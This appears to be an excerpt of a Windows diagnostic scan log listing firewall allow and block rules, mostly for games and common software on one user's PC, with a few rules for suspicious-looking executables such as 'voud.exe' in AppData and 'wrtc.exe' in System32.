FirewallRules: [{C7968B39-F1AA-42A3-8E11-79B8C10A067F}] => (Block) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{FCCB82F8-21B8-43C2-9784-ABFFFEACB5E6}] => (Allow) LPort=25565
FirewallRules: [{BC3B7C55-535B-41BF-B692-624F8E4D33CF}] => (Allow) LPort=25565
FirewallRules: [{999A3144-62FE-4C0A-A97E-07279CFEBC51}] => (Allow) LPort=25564
FirewallRules: [{A5714677-4D53-495A-8D6C-CC7909DD0D49}] => (Allow) LPort=25564
FirewallRules: [TCP Query User{323D79F9-BFAF-48C6-BE21-BB4CB6BDE5FA}C:\windows\system32\java.exe] => (Allow) C:\windows\system32\java.exe
FirewallRules: [UDP Query User{0DAA58B6-5AB5-4049-903D-0394EC732AF9}C:\windows\system32\java.exe] => (Allow) C:\windows\system32\java.exe
FirewallRules: [{87EEDEB5-4EEA-45E3-9B36-CE29DFAC164D}] => (Block) C:\windows\system32\java.exe
FirewallRules: [{521A7236-A979-4BCC-8F22-994039E21505}] => (Block) C:\windows\system32\java.exe
FirewallRules: [TCP Query User{A84F0B22-5F9A-4195-8949-AB90CA8554BB}C:\program files (x86)\team17\worms armageddon\wa.exe] => (Allow) C:\program files (x86)\team17\worms armageddon\wa.exe
FirewallRules: [UDP Query User{F5D1C374-55A1-464D-9F06-DE68D1C86D24}C:\program files (x86)\team17\worms armageddon\wa.exe] => (Allow) C:\program files (x86)\team17\worms armageddon\wa.exe
FirewallRules: [{F75A0811-51C9-48E1-B2D8-FA0C93DD4B0E}] => (Block) C:\program files (x86)\team17\worms armageddon\wa.exe
FirewallRules: [{195E4432-C128-4E67-872C-4C04EBF88B6B}] => (Block) C:\program files (x86)\team17\worms armageddon\wa.exe
FirewallRules: [{9D86AFF5-E0F6-46BB-8BE8-609797670A57}] => (Allow) LPort=25565
FirewallRules: [{A944D8DF-5A7C-4292-9B74-510AB8AE31F6}] => (Allow) LPort=25565
FirewallRules: [TCP Query User{B54AEFD5-9139-44F1-AD9C-1207C31DF98D}C:\program files (x86)\activision\call of duty 2\cod2mp_s.exe] => (Block) C:\program files (x86)\activision\call of duty 2\cod2mp_s.exe
FirewallRules: [UDP Query User{F8DBCF6C-D65F-4B91-B53B-1AC51CFDB93D}C:\program files (x86)\activision\call of duty 2\cod2mp_s.exe] => (Block) C:\program files (x86)\activision\call of duty 2\cod2mp_s.exe
FirewallRules: [TCP Query User{6E86EAFA-AE97-4DB4-836B-E64139E276E5}C:\program files (x86)\steam\steamapps\schillerkillerchiler\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\schillerkillerchiler\team fortress 2\hl2.exe
FirewallRules: [UDP Query User{AB21ACA2-7651-43C9-943C-382F4C1AD924}C:\program files (x86)\steam\steamapps\schillerkillerchiler\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\schillerkillerchiler\team fortress 2\hl2.exe
FirewallRules: [{7A2BE03D-5195-4942-B9C6-2F5C1A2ED106}] => (Block) C:\program files (x86)\steam\steamapps\schillerkillerchiler\team fortress 2\hl2.exe
FirewallRules: [{44F80CE9-8551-48B8-94FC-E3B6A10E6E52}] => (Block) C:\program files (x86)\steam\steamapps\schillerkillerchiler\team fortress 2\hl2.exe
FirewallRules: [{41053F6F-FFFA-4702-A830-14A2BB767A0B}] => (Allow) C:\Program Files (x86)\AVG\AVG2013\avgmfapx.exe
FirewallRules: [{0849BD4D-E3A0-4275-A8C3-CF3515B4DBF5}] => (Allow) C:\Program Files (x86)\AVG\AVG2013\avgmfapx.exe
FirewallRules: [TCP Query User{52D09064-BC51-4A12-BB52-4AE66761D3E8}C:\program files\sony\vegas pro 12.0\vegas120.exe] => (Allow) C:\program files\sony\vegas pro 12.0\vegas120.exe
FirewallRules: [UDP Query User{7EB1611E-7754-4FBA-8E3D-838307A9797A}C:\program files\sony\vegas pro 12.0\vegas120.exe] => (Allow) C:\program files\sony\vegas pro 12.0\vegas120.exe
FirewallRules: [{BF0406A7-D4B6-4878-A918-FE639AF9F459}] => (Block) C:\program files\sony\vegas pro 12.0\vegas120.exe
FirewallRules: [{119E5EDF-F5E1-43F4-BB73-941C3A6C008E}] => (Block) C:\program files\sony\vegas pro 12.0\vegas120.exe
FirewallRules: [{F96DDF35-C481-406D-B8AA-E19F1E5C9EC1}] => (Allow) C:\Program Files (x86)\Z8Games\CrossFire\CF_G4box.exe
FirewallRules: [{192CAB73-C133-4522-808A-F59CF81CB6CC}] => (Allow) C:\Program Files (x86)\Z8Games\CrossFire\CF_G4box.exe
FirewallRules: [TCP Query User{314A4BA4-2B17-4A27-8729-D33EC9E29232}C:\program files\adobe\adobe after effects cs5.5\support files\afterfx.exe] => (Allow) C:\program files\adobe\adobe after effects cs5.5\support files\afterfx.exe
FirewallRules: [UDP Query User{206C3B05-9791-4E51-B327-996201C28BD1}C:\program files\adobe\adobe after effects cs5.5\support files\afterfx.exe] => (Allow) C:\program files\adobe\adobe after effects cs5.5\support files\afterfx.exe
FirewallRules: [TCP Query User{7C118EF2-A57D-45FC-984D-592D0CAFF790}C:\program files (x86)\steam\steamapps\schiller9\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\schiller9\team fortress 2\hl2.exe
FirewallRules: [UDP Query User{91355373-E1F6-455D-AE05-AD4B2B92268F}C:\program files (x86)\steam\steamapps\schiller9\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\schiller9\team fortress 2\hl2.exe
FirewallRules: [{58AB0EE8-F2DE-4B27-BD04-E4FB1D25FE2B}] => (Block) C:\program files (x86)\steam\steamapps\schiller9\team fortress 2\hl2.exe
FirewallRules: [{FDF62167-486F-4BAB-9A69-E4F83626D3C6}] => (Block) C:\program files (x86)\steam\steamapps\schiller9\team fortress 2\hl2.exe
FirewallRules: [TCP Query User{EC993BE6-F7B1-47C2-831C-33CBA20DE7E2}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [UDP Query User{1E31C8EE-9857-4957-8EB9-8072E41F1C84}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [TCP Query User{7F3072BB-06A8-4397-A338-1F33006F85B0}C:\program files\adobe\adobe photoshop cs5 (64 bit)\photoshop.exe] => (Allow) C:\program files\adobe\adobe photoshop cs5 (64 bit)\photoshop.exe
FirewallRules: [UDP Query User{8690DE4B-6D29-4C53-AF80-9E116673CFF4}C:\program files\adobe\adobe photoshop cs5 (64 bit)\photoshop.exe] => (Allow) C:\program files\adobe\adobe photoshop cs5 (64 bit)\photoshop.exe
FirewallRules: [{A4ADA4D3-723A-44C2-8DA1-B75DD4E51F97}] => (Block) C:\program files\adobe\adobe photoshop cs5 (64 bit)\photoshop.exe
FirewallRules: [{4622F224-9C5A-42B2-B199-21AB849581C2}] => (Block) C:\program files\adobe\adobe photoshop cs5 (64 bit)\photoshop.exe
FirewallRules: [TCP Query User{48216D16-2EF1-47E0-A816-D9E8E2220A3F}C:\program files (x86)\totalcmd\totalcmd.exe] => (Allow) C:\program files (x86)\totalcmd\totalcmd.exe
FirewallRules: [UDP Query User{9767458F-7DD2-40BB-B1CF-C27AADAC8DA8}C:\program files (x86)\totalcmd\totalcmd.exe] => (Allow) C:\program files (x86)\totalcmd\totalcmd.exe
FirewallRules: [{9AC21455-AAC9-4E69-AFD0-177F39DDC21D}] => (Block) C:\program files (x86)\totalcmd\totalcmd.exe
FirewallRules: [{583C2F9B-3524-414D-8711-CE35C824D496}] => (Block) C:\program files (x86)\totalcmd\totalcmd.exe
FirewallRules: [{2C2DF604-A1DB-4634-B37D-1FA0B3180825}] => (Allow) C:\Windows\System32\dmwu.exe
FirewallRules: [{AB491E4D-DC09-44F1-86FA-02A3473A9A32}] => (Allow) C:\Windows\System32\dmwu.exe
FirewallRules: [{67F6CB71-1E85-4EA6-BB94-F3EA54A87180}] => (Allow) C:\Windows\System32\ARFC\wrtc.exe
FirewallRules: [{D16CE173-2000-4FE2-8DDD-5D7FE0EF057D}] => (Allow) C:\Windows\System32\ARFC\wrtc.exe
FirewallRules: [{5C195B62-F780-4B49-AC75-B2D7A437BC56}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe
FirewallRules: [{0FCFFF36-575B-4A21-A3FC-EBE89ED967DE}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe
FirewallRules: [TCP Query User{3E2709C6-7C36-426B-B0C0-0B5EA0BAF518}C:\program files (x86)\ubisoft\farcry 3\bin\farcry3.exe] => (Allow) C:\program files (x86)\ubisoft\farcry 3\bin\farcry3.exe
FirewallRules: [UDP Query User{982F001F-E99D-4DD0-9577-8D033AA117B0}C:\program files (x86)\ubisoft\farcry 3\bin\farcry3.exe] => (Allow) C:\program files (x86)\ubisoft\farcry 3\bin\farcry3.exe
FirewallRules: [{566BBD9B-54DE-4B8B-9C78-3157C9E53F0B}] => (Block) C:\program files (x86)\ubisoft\farcry 3\bin\farcry3.exe
FirewallRules: [{A1B67E54-AB91-41EA-9452-116F2BAD4AAC}] => (Block) C:\program files (x86)\ubisoft\farcry 3\bin\farcry3.exe
FirewallRules: [TCP Query User{34618F2F-7058-4A60-982C-E00AAF18B187}C:\users\vadimsch\desktop\meinecraft\minecraft\java\bin\javaw.exe] => (Allow) C:\users\vadimsch\desktop\meinecraft\minecraft\java\bin\javaw.exe
FirewallRules: [UDP Query User{4A5D9427-6BF0-4A78-9993-80A72EE9E9BF}C:\users\vadimsch\desktop\meinecraft\minecraft\java\bin\javaw.exe] => (Allow) C:\users\vadimsch\desktop\meinecraft\minecraft\java\bin\javaw.exe
FirewallRules: [{B76C8C9C-5B72-40E0-994A-C5637AFFA7EA}] => (Block) C:\users\vadimsch\desktop\meinecraft\minecraft\java\bin\javaw.exe
FirewallRules: [{423A13A1-9AA6-420B-8D84-F431F8BBD490}] => (Block) C:\users\vadimsch\desktop\meinecraft\minecraft\java\bin\javaw.exe
FirewallRules: [{935EACA4-0A34-4FAD-85B3-50F84E2060B0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 2\iw4mp.exe
FirewallRules: [{E56E0272-4E86-4031-9E90-8ED1185CAF30}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 2\iw4mp.exe
FirewallRules: [{7005AA72-18AB-40D1-B95A-147681CB1A69}] => (Allow) C:\Program Files (x86)\Bohemia Interactive\ArmA 2 Free\arma2free.exe
FirewallRules: [{144333AB-52E0-4648-BD46-89509C2D6ADB}] => (Allow) C:\Program Files (x86)\Bohemia Interactive\ArmA 2 Free\arma2free.exe
FirewallRules: [TCP Query User{3267224F-F162-4D0D-8F8E-7ADF64E5B92C}C:\users\vadimsch\desktop\trunixx\teamspeak\ts3server_win64.exe] => (Allow) C:\users\vadimsch\desktop\trunixx\teamspeak\ts3server_win64.exe
FirewallRules: [UDP Query User{64C80CE7-AFD9-4E2D-BE4E-AA888C2331C8}C:\users\vadimsch\desktop\trunixx\teamspeak\ts3server_win64.exe] => (Allow) C:\users\vadimsch\desktop\trunixx\teamspeak\ts3server_win64.exe
FirewallRules: [{2A9E57FC-BAD8-494C-9676-92DCF70F12C3}] => (Block) C:\users\vadimsch\desktop\trunixx\teamspeak\ts3server_win64.exe
FirewallRules: [{D1D8EC9C-5D8B-4349-BF76-F3298C12319A}] => (Block) C:\users\vadimsch\desktop\trunixx\teamspeak\ts3server_win64.exe
FirewallRules: [TCP Query User{C1602EB2-23C2-4CC6-81B7-199FF302CCCC}C:\program files\java\jre7\bin\java.exe] => (Allow) C:\program files\java\jre7\bin\java.exe
FirewallRules: [UDP Query User{15D53DAB-5B03-47B1-8FB7-EEA2B1EE98A6}C:\program files\java\jre7\bin\java.exe] => (Allow) C:\program files\java\jre7\bin\java.exe
FirewallRules: [{BE89C084-30F2-4900-B127-DDB179338849}] => (Block) C:\program files\java\jre7\bin\java.exe
FirewallRules: [{2AA4EF1E-3248-4222-B15D-CC4D8B1C7B2D}] => (Block) C:\program files\java\jre7\bin\java.exe
FirewallRules: [{F0518F86-585E-4695-9DE7-29624B816945}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Black Ops II\t6sp.exe
FirewallRules: [{C5ED3262-FE00-4B70-AFC4-06AADD61588F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Black Ops II\t6sp.exe
FirewallRules: [{77F8A331-D9A4-45BD-99B5-CF7D7866F049}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty black ops\BlackOpsMP.exe
FirewallRules: [{55295D6A-3F7C-4708-938C-31CF5EE166D6}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty black ops\BlackOpsMP.exe
FirewallRules: [TCP Query User{777582E1-0005-499B-B0F9-565D1907FE4C}C:\users\vadimsch\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vadimsch\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{BDD71E09-A137-4520-B46D-615ABF72DCBC}C:\users\vadimsch\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vadimsch\appdata\roaming\spotify\spotify.exe
FirewallRules: [{588FA4F4-7E8F-47AA-BE1A-C7F6DA286CD0}] => (Allow) C:\Program Files (x86)\GoforFiles\goforfilesdl.exe
FirewallRules: [{D578B58A-75BB-41F9-84C9-7FF669353E8E}] => (Allow) C:\Program Files (x86)\GoforFiles\goforfilesdl.exe
FirewallRules: [{69969707-9987-4349-B1D4-A1691F76D133}] => (Allow) C:\Program Files (x86)\GoforFiles\GoforFiles.exe
FirewallRules: [{6064F1D1-D289-4D64-94EC-4DC7FA06DFF8}] => (Allow) C:\Program Files (x86)\GoforFiles\GoforFiles.exe
FirewallRules: [TCP Query User{21F1FFAF-6B23-4C35-8B07-68574289D309}C:\users\vadimsch\appdata\local\iw4m\iw4m.dat] => (Block) C:\users\vadimsch\appdata\local\iw4m\iw4m.dat
FirewallRules: [UDP Query User{DDA34C16-F3B7-4A59-A028-3D3F1EE415A7}C:\users\vadimsch\appdata\local\iw4m\iw4m.dat] => (Block) C:\users\vadimsch\appdata\local\iw4m\iw4m.dat
FirewallRules: [{45AEEE1A-DEC2-4FD3-9CDA-DC450BA3D2EC}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{D456141F-BA0B-40AB-B93C-8E9F4AA23585}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{EB62F810-D268-4570-AC4A-8D6E1A3BC932}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Medal of Honor\Binaries\moh.exe
FirewallRules: [{225F6ACB-82BD-4BB9-A4EE-1E86741EB63F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Medal of Honor\Binaries\moh.exe
FirewallRules: [{FB5D6F31-D1C7-476B-85C6-45034ABC61FB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Medal of Honor\MP\mohmpgame.exe
FirewallRules: [{68C42684-2463-46A3-BE74-3A4A9E411B16}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Medal of Honor\MP\mohmpgame.exe
FirewallRules: [{B07402DC-7239-4BAA-8919-E9A3522A5A9C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Medal of Honor\Support\EA Help\Electronic_Arts_Technical_Support.htm
FirewallRules: [{592035A2-BC42-4922-BB9D-C85E699463E3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Medal of Honor\Support\EA Help\Electronic_Arts_Technical_Support.htm
FirewallRules: [{740C5F90-CBFA-402F-B749-AC674C864D06}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\mirrors edge\Support\EA Help\Electronic_Arts_Technical_Support.htm
FirewallRules: [{C9381825-CF76-44CE-9B8F-2C611543ACC0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\mirrors edge\Support\EA Help\Electronic_Arts_Technical_Support.htm
FirewallRules: [{A8614B93-4B81-42A9-BA91-AC392E1D772C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Crysis 2 Game of the Year\bin32\Crysis2Launcher.exe
FirewallRules: [{16D62152-2083-4C19-8EA6-52A770B63F0E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Crysis 2 Game of the Year\bin32\Crysis2Launcher.exe
FirewallRules: [{B4C9F6D7-765B-4F8B-967F-BFA560A40861}] => (Allow) C:\Users\VadimSch\AppData\Roaming\Raelaq\voud.exe
FirewallRules: [{4FB5F9C8-7005-4F39-BC39-8D2E3C94A28B}] => (Allow) C:\Users\VadimSch\AppData\Roaming\Raelaq\voud.exe
FirewallRules: [{F20CD6D1-783A-44DF-A27E-07D51677E650}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Painkiller Black Edition\Bin\Painkiller.exe
FirewallRules: [{92F3BB10-9A30-4985-BE47-F2C81AE734E8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Painkiller Black Edition\Bin\Painkiller.exe
FirewallRules: [{AB9A2E3E-9A15-4A2E-9DD1-27A481416344}] => (Allow) C:\Program Files (x86)\Iminent\Iminent.exe
FirewallRules: [{834A136A-C30A-4A1E-9D57-2F1F4B6C40D4}] => (Allow) C:\Program Files (x86)\Iminent\Iminent.Messengers.exe
FirewallRules: [{9D847FB9-5334-4CFC-A626-FF16F621EB29}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Edna and Harvey Harvey's New Eyes\harvey.exe
FirewallRules: [{9AC33D18-9DA9-4258-9AD5-531EAD77EDB2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Edna and Harvey Harvey's New Eyes\harvey.exe
FirewallRules: [{C0BF220E-8F81-4D76-A51F-4D8B72BCD88E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Edna and Harvey Harvey's New Eyes\VisionaireConfigurationTool.exe
FirewallRules: [{6DCDE85F-EC84-4D84-846F-59F1B253BA55}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Edna and Harvey Harvey's New Eyes\VisionaireConfigurationTool.exe
FirewallRules: [TCP Query User{078E3B05-A7D7-4EC5-ABBF-FE798C2196DC}C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe
FirewallRules: [UDP Query User{E2547F57-403B-4A11-B68E-A32C111934EE}C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe
FirewallRules: [{4C624777-9771-47B1-AD73-979196D60F24}] => (Block) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe
FirewallRules: [{EC2093C6-87D6-4C30-82B7-B56AB0B60E70}] => (Block) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe
FirewallRules: [{3EE409A1-3ACD-4725-BC29-A188A0FD89CE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Worms Armageddon\WA.exe
FirewallRules: [{8B158057-8E2A-4643-87DE-05895D688E7F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Worms Armageddon\WA.exe
FirewallRules: [{297BBB5E-7F86-440D-9B68-02458D5B13E8}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{8E102BEF-5696-4E88-A156-C6321BE3F511}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{12B682BB-8B17-41B5-951D-555B95CCABE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{DB183FCA-2E1E-4266-9195-18C6B1804265}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Black Ops II\t6mp.exe
FirewallRules: [{4B8A3B34-5D25-449A-809E-30B58150BEF1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Black Ops II\t6mp.exe
FirewallRules: [{8B424040-841B-4AF0-A648-A68FA9D7CDF8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Black Ops II\t6zm.exe
FirewallRules: [{80ED1857-3E70-4603-A31F-19D865D674D6}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Black Ops II\t6zm.exe
FirewallRules: [TCP Query User{4CD357FA-33FB-4A3B-8501-CC4A678F9DC0}C:\windows\syswow64\javaw.exe] => (Block) C:\windows\syswow64\javaw.exe
FirewallRules: [UDP Query User{AFF7BF6F-3224-4EE8-9297-070575CA65E9}C:\windows\syswow64\javaw.exe] => (Block) C:\windows\syswow64\javaw.exe
FirewallRules: [TCP Query User{3670599C-84EC-4AE2-85D3-DA3697A12DDD}C:\windows\system32\javaw.exe] => (Block) C:\windows\system32\javaw.exe
FirewallRules: [UDP Query User{77AF9AE4-DA06-4982-9EFB-0B992621F2D6}C:\windows\system32\javaw.exe] => (Block) C:\windows\system32\javaw.exe
FirewallRules: [{A0F52F3A-0D1D-4DD1-9997-7FDD91C84CDF}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Miasmata\Miasmata.exe
FirewallRules: [{7F7FDDF5-2930-479F-834F-94679E432E32}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Miasmata\Miasmata.exe
FirewallRules: [{3F3ACE00-D528-4C29-AEA8-6D4B8B1C037E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Surgeon Simulator 2013\ss2013.exe
FirewallRules: [{16D8241C-9652-40DE-95BC-97057582554B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Surgeon Simulator 2013\ss2013.exe
FirewallRules: [{8AC7848F-1A08-4932-A505-8EC73EF3C24F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Arma 2\arma2.exe
FirewallRules: [{105A2199-B09B-4A69-9DAB-6A3AEFCCB7CA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Arma 2\arma2.exe
FirewallRules: [{47E9674D-C081-45D9-A995-FC36F795AD5C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Arma 2 Operation Arrowhead\ArmA2OA.exe
FirewallRules: [{F4F7CE8C-7119-4C1A-94AD-6C647B4B191C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Arma 2 Operation Arrowhead\ArmA2OA.exe
FirewallRules: [TCP Query User{8A7D13C2-97A5-4C0E-A0A5-324A7A75CE15}C:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\expansion\beta\arma2oa.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\expansion\beta\arma2oa.exe
FirewallRules: [UDP Query User{75E3C12B-56D5-43FE-BB30-DE42BDE79907}C:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\expansion\beta\arma2oa.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\expansion\beta\arma2oa.exe
FirewallRules: [{3DBBAADE-268A-4734-91D0-D54D9423FDEE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PAYDAY The Heist\payday_win32_release.exe
FirewallRules: [{BD6672C2-586D-4B3E-A61B-B8AC273D63A8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PAYDAY The Heist\payday_win32_release.exe
FirewallRules: [{F9E3134D-0DF0-4DAF-ADBC-35D2775ACE95}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{8AB3B2C2-B839-4BBD-B875-299B2F80F37F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{7333ED60-4CF8-434A-A084-11753569D55F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{F93A7ED0-3405-4637-B346-FC4A7B0501BC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{46F208DC-4649-4D0C-A0D6-C7DF32FE1D86}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\WormsXHD\Launcher.exe
FirewallRules: [{471BB32B-1C6A-4E95-9A54-784AD4CDFA89}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\WormsXHD\Launcher.exe
FirewallRules: [{708F779E-7649-4315-82CB-2901E0214C53}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{BE8E60A6-EC54-4D5F-A150-E732ED9C987C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{4581994E-923A-4CCE-8D7D-2B1D5E2DA8A0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty black ops\BlackOps.exe
FirewallRules: [{D7120F0C-8E28-43BF-98F2-0784B00BFE6E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty black ops\BlackOps.exe
FirewallRules: [{20CF3DAA-1B18-49DA-91F5-3E28C1487F2D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty black ops\BlackOps.exe
FirewallRules: [{07C64705-EE71-4DC5-AF70-650C6B4C453E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty black ops\BlackOps.exe
FirewallRules: [{661275A4-6473-44AB-A489-531DC07AE6D8}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{6227BB75-8BE1-482D-9116-B89490B40BDC}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{15E9A7D8-AFB9-47D7-83BC-BD8C8FF62F95}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\left 4 dead 2\left4dead2.exe
FirewallRules: [{DE1C789E-23EF-45AF-BC03-FE093EEE8931}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\left 4 dead 2\left4dead2.exe
FirewallRules: [{39A9A371-A259-4E64-A454-268E6B0BE035}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{A142362E-70A2-418F-B771-5364FFEF84C6}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{B556C333-0845-472C-9AC8-68FE8D016C15}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{C266CB05-A2CD-49F9-A1E7-3BE6F1275E07}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{D8154441-181F-4E5E-8273-15A0020A5836}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{0974FAC5-17B4-44C3-BD22-D31335F63E8C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{9A8BC50E-061F-48FD-9960-8C62DA89C60C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 2\iw4sp.exe
FirewallRules: [{875D738D-8FB8-4471-82B8-5E05F53BDAFC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 2\iw4sp.exe
FirewallRules: [{8D4F85DE-D89C-4DA7-A60B-35D5CA22CEA3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Ghosts\iw6mp64_ship.exe
FirewallRules: [{EDAD2F48-3229-438E-B212-2912996FC3BF}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Ghosts\iw6mp64_ship.exe
FirewallRules: [{E1515609-143A-4D55-B583-7F5411557FB3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Ghosts\iw6mp64_ship.exe
FirewallRules: [{77F72CB4-62E1-465C-9D58-1AE020C053D9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Ghosts\iw6mp64_ship.exe
FirewallRules: [{BA2D663E-C3AF-47E3-8340-5B145782E670}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\left 4 dead 2\left4dead2.exe
FirewallRules: [{8EDF0DAF-B5D1-44A6-A87E-30D75ADD6EDE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\left 4 dead 2\left4dead2.exe
FirewallRules: [{5AF92DD5-796E-47C8-8A2A-7EEB42A9CFDD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\nmrih\sdk\bin\Hammer.bat
FirewallRules: [{8C21FB00-172A-4361-B4FE-19DDF3064EC0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\nmrih\sdk\bin\Hammer.bat
FirewallRules: [{467BFA60-E6FD-4F49-94DF-3F61AFE24D26}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\left 4 dead 2\left4dead2.exe
FirewallRules: [{1E925769-EBE9-40FF-A46B-D5008D467ADB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\left 4 dead 2\left4dead2.exe
FirewallRules: [{78862C73-E582-4193-80A7-D34B4A07EED0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty modern warfare 3\iw5sp.exe
FirewallRules: [{1D78F0CF-B2DD-447C-BF77-7B49203D1B82}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty modern warfare 3\iw5sp.exe
